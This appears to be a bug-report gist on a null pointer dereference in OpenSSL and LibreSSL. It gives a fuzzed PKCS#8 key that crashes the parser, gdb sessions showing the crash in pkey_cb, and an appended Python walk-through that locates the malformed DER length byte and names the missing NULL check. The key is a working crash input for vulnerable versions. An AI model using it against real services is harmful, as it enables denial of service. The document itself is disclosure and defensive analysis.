Created April 10, 2015 04:37
fmunozs/a26d22ee4ca7196e828d
OpenSSL / LibreSSL null dereference
OpenSSL Null pointer Dereference
=================================
I *think* anything below 1.0.2 is affected. I didn't have time to report it
but noticed that the last update doesn't crash anymore, so I guess one of
the recently fixed CVEs fixed this too [1].
[1] https://www.openssl.org/news/secadv_20150319.txt
(old) Openssl on OSX
====================
$ cat fuck.key
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASKBKgwggSkAgEAAoIBAQDATDHcRCvHOxmy
eSmnNjIIyc7dEsrjNMVSHIwMuW+aUKp8YWi4t0RqZ4iHVqtK6kZ9guuIf95MsGRq
mqgG8cQd8SUU2Tb4F7ex6jETQMfxPw24Owz4vvk1PvWYHv8V6vbWY2pio3VzLKdA
XwWJ0mB3b8FiwWrXhEKmHdv6uViErIeAbfoTVhEaTXFyOCRBJFpUTLWVImojQMGe
I88bqOpJ12alpQLXKuhA8//DJUz1CV44hQfzXEEW0OJpnpgPNHwgi+cYrBqruHv2
BwDek50xduZQX27An9OYfbXGsRKXVxc6tyK+hD+L3I1IT0XjDkrPsXV+me0jG874
8l9CJqZJAgMBAAECggEAWx/AQPDNDgwjkT95TZORAjkfngNZwXEwUEjW1PDKwgWX
xHkkduPht8p4GCop4cZCwRdZJcXyQcUU0K+ZEDFhDg9H0ylbsxUKJ3Ui7Ey2csu+
ZJ8W9okI7wJ2vy9xEaHWdqGFuFhdP8bZOtfMeBMJQ4/hxDqDtr0mGDHuHFHYcIW+
+RaaxAUmINKJ/K/yru0uOwDmmVSTT7sIQMGVqZhEFXDbFEFVxLgJ7Gk5VDUdiYEv
eBdJFPEXGJr/Mg64/A2jBT2RRFEDLB5JevFuV0T3GPS4NzTlLaADGf9gGfmyBO6X
4beQ9MT9o+WCTVJtFnbAkuk5V5p3+khNfXYq7gRdQQKBgQDnVovh7+W0ZFoGA8Lk
/t0q6JVBiIosnnAJlHiiFL8OlaRsWxKDfEoB2Cp8jQN1c9r1Y1EA3tefxAR+PcSy
QFj0gT0mATk5WI74jjAUomouwk4kKD8Hmz9NBrIC2Lecf287a9A34AW9oOZK6Eet
VLQ/CUzJzLWJ8wEfXv8sIjvUgwKBgQDUzDHbP8vPidPwx4jFqjWJCf4iMUzTkzR+
kW9gX0wiz9sAlHXtK4w8wte1nWpeC2nRekZZzog5UEZ1NaDUcQdTPOmKV2WhHiFK
OIhfCkel2HFJ5+tpoZNMMPeqzqK1ztVJzXStkfLQtxpYpC2gZW8XK3kDQ3fYRIuF
N4eB9ftYQwKBgQCQlJ+CCouWTW2R+sHQmpShX5EAzxQERNUit58ZNTwfIlkLu3N7
p68dLfuHsh3qRwkeef7DO4KpgDmKqJIJEXxG+4q6+OLJu1ZHc54LF2KjbJ6nrFuQ
Jm/OdRPGAannbiGXko8kjKcp16h2QmuhoaGxD9/k80K2P6CA+b8i1xZrfwKBgF7K
32K1lorK8PiPSiQTYGm9Y9HDeF+/cWD4VE7v5LCVOw+VErsl7QCcIw8qIlnmZ6sC
9xfGYvR1CA3qZ8x61TKFLduMdx9Alr/DUyxTHfuI4V50y29wpHcKUSlrhxvKGUUZ
GuK+4xWKm1flOtX6mXQOz4depKJYVnZveBOyidaVAoGBAJcI1K8QIg2owNuWmE+Y
YeUa8OHvXhaPmErcWZqXAPzf1LWI3wmd7j9wzj8g7nZz8eTwAZUNUw4xbzMBF+Hb
d+/2XrEcQMEe+jeWhGMZPsZ8DFUTan1jA9StZN6ngHAaRs7P47o/+1As5AOJioyt
9zeQErFpG8e3F4WpsawsM+Dh
-----END PRIVATE KEY-----
$ gdb ssh
GNU gdb 6.3.50-20050815 (Apple version gdb-1824) (Wed Feb 6 22:51:23 UTC 2013)
..
(gdb) run -i fuck.key root@localhost
Starting program: /usr/bin/ssh -i fuck.key root@localhost
Reading symbols for shared libraries ..... done
...
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x0000000000000008
0x00007fff81bd8770 in pkey_cb ()
LibreSSL +debug info
====================
[fmunozs@hydra libressl-2.1.1]$ LD_LIBRARY_PATH=ssl/.libs/:crypto/.libs/ gdb ./apps/.libs/openssl
GNU gdb (GDB) 7.9
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./apps/.libs/openssl...done.
(gdb) run rsa -in fuck.key -check
Starting program: /home/fmunozs/libressl/src/libressl-2.1.1/apps/.libs/openssl rsa -in fuck.key -check
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff78499b7 in pkey_cb (operation=2, pval=0x7fffffffda78, it=0x7ffff7b559c0 <PKCS8_PRIV_KEY_INFO_it>, exarg=0x0) at asn1/p8_pkey.c:72
72 if (key->pkey->value.octet_string)
(gdb) print key
$1 = (PKCS8_PRIV_KEY_INFO *) 0x690a30
(gdb) print key->pkey
$2 = (ASN1_TYPE *) 0x0
(gdb)
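As an added example that is not part of the gist, and not code from OpenSSL or LibreSSL, the Python below walks the DER of the key posted above and shows where a strict decoder has to give up: the privateKey OCTET STRING tag at byte offset 22 is followed by the length byte 0x8A, which announces a ten-byte length field, where a well-formed 1192-byte OCTET STRING is encoded 04 82 04 A8. The DER rules enforced here (minimal length encoding, a length field no wider than a C long, no element running past its parent) are this example's own simplified checks, not OpenSSL's asn1_get_length. The gdb session above fits that reading: operation=2 in pkey_cb is ASN1_OP_FREE_PRE, so the callback is running while the partially built PKCS8_PRIV_KEY_INFO is being freed after the failed decode, and key->pkey was never assigned. The repair step, rewriting that one byte to 0x82, assumes the rest of the key is intact, which holds for this particular file.

```python
"""Locate the malformed length field in the fuzzed PKCS#8 key from the gist.

Added example; not code from the gist, OpenSSL or LibreSSL.  The DER rules
enforced here are a simplified version of what a strict decoder must check:
minimal length encoding, a length field no wider than 8 bytes (a C long), and
no element running past its parent or the end of the input.
"""
import base64

# Constructed input: the fuzzed key exactly as posted in the gist.
FUZZED_KEY_PEM = """\
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASKBKgwggSkAgEAAoIBAQDATDHcRCvHOxmy
eSmnNjIIyc7dEsrjNMVSHIwMuW+aUKp8YWi4t0RqZ4iHVqtK6kZ9guuIf95MsGRq
mqgG8cQd8SUU2Tb4F7ex6jETQMfxPw24Owz4vvk1PvWYHv8V6vbWY2pio3VzLKdA
XwWJ0mB3b8FiwWrXhEKmHdv6uViErIeAbfoTVhEaTXFyOCRBJFpUTLWVImojQMGe
I88bqOpJ12alpQLXKuhA8//DJUz1CV44hQfzXEEW0OJpnpgPNHwgi+cYrBqruHv2
BwDek50xduZQX27An9OYfbXGsRKXVxc6tyK+hD+L3I1IT0XjDkrPsXV+me0jG874
8l9CJqZJAgMBAAECggEAWx/AQPDNDgwjkT95TZORAjkfngNZwXEwUEjW1PDKwgWX
xHkkduPht8p4GCop4cZCwRdZJcXyQcUU0K+ZEDFhDg9H0ylbsxUKJ3Ui7Ey2csu+
ZJ8W9okI7wJ2vy9xEaHWdqGFuFhdP8bZOtfMeBMJQ4/hxDqDtr0mGDHuHFHYcIW+
+RaaxAUmINKJ/K/yru0uOwDmmVSTT7sIQMGVqZhEFXDbFEFVxLgJ7Gk5VDUdiYEv
eBdJFPEXGJr/Mg64/A2jBT2RRFEDLB5JevFuV0T3GPS4NzTlLaADGf9gGfmyBO6X
4beQ9MT9o+WCTVJtFnbAkuk5V5p3+khNfXYq7gRdQQKBgQDnVovh7+W0ZFoGA8Lk
/t0q6JVBiIosnnAJlHiiFL8OlaRsWxKDfEoB2Cp8jQN1c9r1Y1EA3tefxAR+PcSy
QFj0gT0mATk5WI74jjAUomouwk4kKD8Hmz9NBrIC2Lecf287a9A34AW9oOZK6Eet
VLQ/CUzJzLWJ8wEfXv8sIjvUgwKBgQDUzDHbP8vPidPwx4jFqjWJCf4iMUzTkzR+
kW9gX0wiz9sAlHXtK4w8wte1nWpeC2nRekZZzog5UEZ1NaDUcQdTPOmKV2WhHiFK
OIhfCkel2HFJ5+tpoZNMMPeqzqK1ztVJzXStkfLQtxpYpC2gZW8XK3kDQ3fYRIuF
N4eB9ftYQwKBgQCQlJ+CCouWTW2R+sHQmpShX5EAzxQERNUit58ZNTwfIlkLu3N7
p68dLfuHsh3qRwkeef7DO4KpgDmKqJIJEXxG+4q6+OLJu1ZHc54LF2KjbJ6nrFuQ
Jm/OdRPGAannbiGXko8kjKcp16h2QmuhoaGxD9/k80K2P6CA+b8i1xZrfwKBgF7K
32K1lorK8PiPSiQTYGm9Y9HDeF+/cWD4VE7v5LCVOw+VErsl7QCcIw8qIlnmZ6sC
9xfGYvR1CA3qZ8x61TKFLduMdx9Alr/DUyxTHfuI4V50y29wpHcKUSlrhxvKGUUZ
GuK+4xWKm1flOtX6mXQOz4depKJYVnZveBOyidaVAoGBAJcI1K8QIg2owNuWmE+Y
YeUa8OHvXhaPmErcWZqXAPzf1LWI3wmd7j9wzj8g7nZz8eTwAZUNUw4xbzMBF+Hb
d+/2XrEcQMEe+jeWhGMZPsZ8DFUTan1jA9StZN6ngHAaRs7P47o/+1As5AOJioyt
9zeQErFpG8e3F4WpsawsM+Dh
-----END PRIVATE KEY-----
"""

# Mandatory PrivateKeyInfo fields (RFC 5208) in order; attributes is OPTIONAL.
PKCS8_FIELDS = ("version", "privateKeyAlgorithm", "privateKey")
TAG_SEQUENCE = 0x30


class DERError(ValueError):
    """Raised where a strict DER decoder gives up on the input."""


def pem_to_der(pem: str) -> bytes:
    body = "".join(l for l in pem.splitlines() if not l.startswith("-----"))
    return base64.b64decode(body)


def read_header(buf: bytes, pos: int):
    """Decode the tag and length at buf[pos]; return (tag, length, header_size)."""
    if pos + 2 > len(buf):
        raise DERError(f"offset {pos}: truncated tag/length")
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:                      # short form: the byte is the length
        length, n = first, 0
    else:
        n = first & 0x7F                  # long form: n length bytes follow
        if n == 0:
            raise DERError(f"offset {pos}: tag 0x{tag:02x} uses indefinite length (BER, not DER)")
        if n > 8:
            raise DERError(f"offset {pos}: tag 0x{tag:02x} length field is {n} bytes "
                           f"(length byte 0x{first:02x}), wider than a C long")
        if pos + 2 + n > len(buf):
            raise DERError(f"offset {pos}: tag 0x{tag:02x} length field is truncated")
        length = int.from_bytes(buf[pos + 2:pos + 2 + n], "big")
        if length < 0x80 or buf[pos + 2] == 0:
            raise DERError(f"offset {pos}: tag 0x{tag:02x} length {length} is not minimally encoded")
    if pos + 2 + n + length > len(buf):
        raise DERError(f"offset {pos}: tag 0x{tag:02x} claims {length} bytes, "
                       f"only {len(buf) - pos - 2 - n} remain")
    return tag, length, 2 + n


def check_pkcs8(der: bytes):
    """Walk the three mandatory PrivateKeyInfo fields.

    Returns (bad_field, offset, message): bad_field names the first field whose
    header a strict decoder rejects (None if all three are well formed), offset
    is where that field's tag byte sits (or where the walk ended).
    """
    tag, length, hdr = read_header(der, 0)
    if tag != TAG_SEQUENCE:
        raise DERError(f"outer tag 0x{tag:02x} is not SEQUENCE")
    pos, end = hdr, hdr + length
    for name in PKCS8_FIELDS:
        try:
            tag, length, hdr = read_header(der[:end], pos)   # stay inside the parent
        except DERError as exc:
            return name, pos, str(exc)
        pos += hdr + length
    return None, pos, "version, privateKeyAlgorithm and privateKey all decode"


def analyze_gist_key() -> dict:
    """Check the gist's key, then a copy with the bad length byte rewritten.

    Assumption (true for this file): only that one byte is corrupt, so 0x82
    (two length bytes follow) restores the 04 82 04 A8 header of a 1192-byte
    OCTET STRING.
    """
    der = pem_to_der(FUZZED_KEY_PEM)
    field, offset, message = check_pkcs8(der)
    repaired = bytearray(der)
    if field is not None:
        repaired[offset + 1] = 0x82
    return {
        "bad_field": field,
        "offset": offset,
        "length_byte": der[offset + 1] if field else None,
        "message": message,
        "repaired_ok": check_pkcs8(bytes(repaired))[0] is None,
    }


if __name__ == "__main__":
    for key, value in analyze_gist_key().items():
        print(f"{key}: {value}")
```

The check a practitioner wants on the library side is the guard that line 72 of p8_pkey.c lacks: because the FREE_PRE callback runs on partially constructed objects, pkey_cb has to test `key->pkey != NULL` (and, since pkey is ASN1_ANY, that `key->pkey->type == V_ASN1_OCTET_STRING`) before touching `key->pkey->value.octet_string`. Without it, anything that feeds untrusted PKCS#8 to the decoder, a key-upload endpoint as much as `ssh -i` on a file someone handed you, is a one-byte-flip crash.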